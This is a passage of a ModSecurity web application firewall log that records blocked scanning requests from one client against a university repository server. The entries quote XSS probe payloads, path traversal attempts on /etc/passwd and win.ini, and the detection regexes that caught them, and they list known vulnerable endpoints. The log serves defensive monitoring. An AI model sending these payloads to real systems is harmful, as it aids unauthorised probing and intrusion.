[Tue Aug 29 11:56:12.674801 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAAq5@N8AAAAK"]
[Tue Aug 29 11:56:13.543452 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO16bcCo-f0AAArC7hsAAAAW"]
[Tue Aug 29 11:56:13.544194 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAApbUxwAAAAh"]
[Tue Aug 29 11:56:14.895180 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16bsCo-f0AAAocyfQAAAAR"]
[Tue Aug 29 11:56:16.764459 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16cMCo-f0AAAq5@OkAAAAK"]
[Tue Aug 29 11:56:17.082793 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16ccCo-f0AAAqeFmAAAAAx"]
[Tue Aug 29 11:56:17.188036 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16ccCo-f0AAAocygcAAAAR"]
[Tue Aug 29 11:56:17.732871 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAAq2Kg8AAAAE"]
[Tue Aug 29 11:56:18.807092 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAAq3a9MAAAAI"]
[Tue Aug 29 11:56:19.623552 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAApHRnUAAAAP"]
[Tue Aug 29 11:56:21.890049 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArJXkgAAAAZ"]
[Tue Aug 29 11:56:22.016428 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAAqeFoAAAAAx"]
[Tue Aug 29 11:56:22.963802 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAArJXlcAAAAZ"]
[Tue Aug 29 11:56:23.550903 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAArLLcoAAAAb"]
[Tue Aug 29 11:56:23.648218 2023] [:error] [pid 2762] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:searchTerm: x' alert(1) 'x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArKv1wAAAAa"]
[Tue Aug 29 11:56:24.836582 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArB10oAAAAV"]
[Tue Aug 29 11:56:25.716203 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ecCo-f0AAAq-Ha8AAAAT"]
[Tue Aug 29 11:56:27.311609 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAApHRoQAAAAP"]
[Tue Aug 29 11:56:30.069145 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fsCo-f0AAAoAlBcAAAAC"]
[Tue Aug 29 11:56:30.532815 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAAq5@RwAAAAK"]
[Tue Aug 29 11:56:30.585728 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAAoAlB8AAAAC"]
[Tue Aug 29 11:56:33.619705 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAAolK3EAAAAe"]
[Tue Aug 29 11:56:34.574361 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAAqSw9MAAAAN"]
[Tue Aug 29 11:56:36.672725 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAoz8LYAAAAS"]
[Tue Aug 29 11:56:36.698199 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAAqSw9oAAAAN"]
[Tue Aug 29 11:56:38.802117 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hsCo-f0AAArB13wAAAAV"]
[Tue Aug 29 11:56:39.712115 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAArZPyEAAAAC"]
[Tue Aug 29 11:56:39.796932 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAArZPyUAAAAC"]
[Tue Aug 29 11:56:39.856868 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 